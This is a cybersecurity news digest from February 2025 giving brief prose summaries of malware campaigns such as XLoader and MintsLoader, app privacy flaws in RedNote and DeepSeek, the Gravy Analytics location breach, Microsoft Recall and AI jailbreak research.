CyberSecurity updates
2025-02-22 07:50:31 Pacfic

Cybercriminals Abuse Jarsigner to Deploy XLoader Malware - 1d
Cybercriminals Abuse Jarsigner to Deploy XLoader Malware

A new malware campaign is using a DLL side-loading technique to distribute the XLoader malware through a legitimate tool called jarsigner.exe, which is part of the Eclipse Foundation’s IDE package. Cybercriminals are placing malicious DLL files alongside the legitimate executable, ensuring their execution when the application runs. This method allows the malware to evade detection.

RedNote App Security Issues - 2d
RedNote App Security Issues

This cluster details a report by Citizen Lab and the EFF Threat Lab highlighting critical privacy vulnerabilities in the “RedNote” app. The analysis of version 8.59.5 found that the app transmits user content over unencrypted HTTP, potentially exposing sensitive data to network attackers. Static analysis also revealed the use of static keys for encrypting certain files, exposing those files to decryption. Furthermore, the app transmits device metadata without encryption, potentially vulnerable to man-in-the-middle attacks.

DeepSeek's Privacy Concerns - 12d

DeepSeek, a Chinese AI chatbot, garnered attention for its impressive performance and open-source approach. However, its rapid rise sparked security concerns regarding data transfer practices. Researchers discovered that the iOS application transmits user data unencrypted to servers controlled by ByteDance.

Brave Browser Introduces Custom Scriptlets for Privacy - 11d

Brave Browser is introducing a new feature called ‘custom scriptlets’ that allows advanced users to inject their own JavaScript into websites, enabling greater control over their browsing experience. This functionality enhances privacy by blocking trackers and customizing website content, offering deeper customization and control.

OpenAI Model Vulnerability to Jailbreaks - 12d
OpenAI Model Vulnerability to Jailbreaks

Recent research suggests that OpenAI’s models, while powerful, are susceptible to “jailbreaks” or “fine-tuning” that can override their safety restrictions. This means that models designed for benign tasks can be trained to produce responses with malicious intent. The findings highlight an important vulnerability in current AI safety mechanisms and raise concerns about the potential for misaligned behavior from AI systems in real-world applications.

Massive Location Data Breach Affects Millions - 12d
Massive Location Data Breach Affects Millions

A massive data breach at location data company Gravy Analytics has exposed sensitive location data of millions of users. The breach affects users of popular apps like Candy Crush, Tinder, and MyFitnessPal, among thousands of others. This incident underscores the risks associated with the collection and sale of location data, particularly from advertising bid streams, without users’ or even app developers’ knowledge. The breach was posted on a Russian-language forum by the hacker using the alias “Nightly” and contained coordinates of devices in the US, Europe, and Russia.

Microsoft Recall Exposes Sensitive Data Screenshots - 9d
Microsoft Recall Exposes Sensitive Data Screenshots

Microsoft’s new AI feature ‘Recall’ for Copilot+ PCs stores screenshots of sensitive data, including credit cards and social security numbers, even when a ‘sensitive information’ filter is enabled. This has raised serious privacy and security concerns among users. This feature takes continuous screenshots of everything a user does. The data is stored locally but sent off to Microsoft’s LLM for analysis. This has prompted an investigation by the UK Information Commissioner’s Office. This incident highlights the potential risks of AI-powered surveillance features and the importance of user privacy.

Malicious QR Codes Distributed via Email and Snail Mail - 5d

Malicious actors are distributing malicious QR codes through various channels, including email attachments and physical mail. These QR codes lead to malicious applications designed to steal login credentials and other sensitive information. Security analysts are struggling to counter these attacks, while some email security vendors are employing overly aggressive flagging mechanisms that hinder legitimate communications.

MintsLoader Delivering StealC and BOINC - 23d

A widespread campaign is leveraging the MintsLoader malware loader to distribute secondary payloads, including the StealC information stealer and a legitimate open-source network computing platform called BOINC. MintsLoader, a PowerShell-based loader, is delivered via spam emails with malicious attachments. This campaign targets a wide range of users with the intent to steal sensitive information using Stealc, and also leveraging BOINC for other malicious purposes such as crypto mining and other resource abuse. The multi-pronged approach makes this campaign more versatile and dangerous.